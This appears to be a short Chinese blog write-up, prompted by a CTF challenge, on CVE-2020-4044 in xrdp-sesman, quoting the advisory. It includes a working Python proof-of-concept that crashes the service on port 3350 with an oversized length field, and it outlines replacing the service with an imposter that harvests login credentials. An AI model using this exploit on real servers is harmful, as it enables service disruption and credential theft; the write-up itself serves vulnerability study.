本文详细介绍了CVE-2020-4044,这是一个针对xrdp-sesman服务的缓冲区溢出漏洞。攻击者可以通过构造恶意payload,导致服务崩溃并启动恶意替代服务,从而捕获用户凭证。由于xrdp仅允许单个连接,攻击实施过程中存在一定的复杂性。提供的Python脚本展示了如何触发该漏洞。
上次强网杯考了xrdp的题目,后来发现之前还有一个cve
CVE-2020-4044
The xrdp-sesman service before version 0.9.13.1 can be crashed by connecting over port 3350 and supplying a malicious payload. Once the xrdp-sesman process is dead, an unprivileged attacker on the server could then proceed to start their own imposter sesman service listening on port 3350. This will allow them to capture any user credentials that are submitted to XRDP and approve or reject arbitrary login credentials. For xorgxrdp sessions in particular, this allows an unauthorized user to hijack an existing session. This is a buffer overflow attack, so there may be a risk of arbitrary code execution as well.
这个exp其实比较好写,就是一个size任意赋值导致的堆溢出
#!/usr/bin/python3
import socket
def p32_big(content):
return content.to_bytes(4,"big")
def connect():
s = socket.socket()
host = "127.0.0.1"
port = 3350
s.connect((host, port))
return s
fd=connect()
fd.sendall(p32_big(0)+p32_big(0xffffff8))
fd.sendall(b"a"*0xfffff)
这里官方对这个的定义其实就是一个劫持,我们把它打挂以后,跑一个恶意的xrdp收集凭证
因为这个版本的xrdp只支持一次一个连接,堆喷也比较麻烦,因为后面没啥结构体了
扫一扫
1589
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
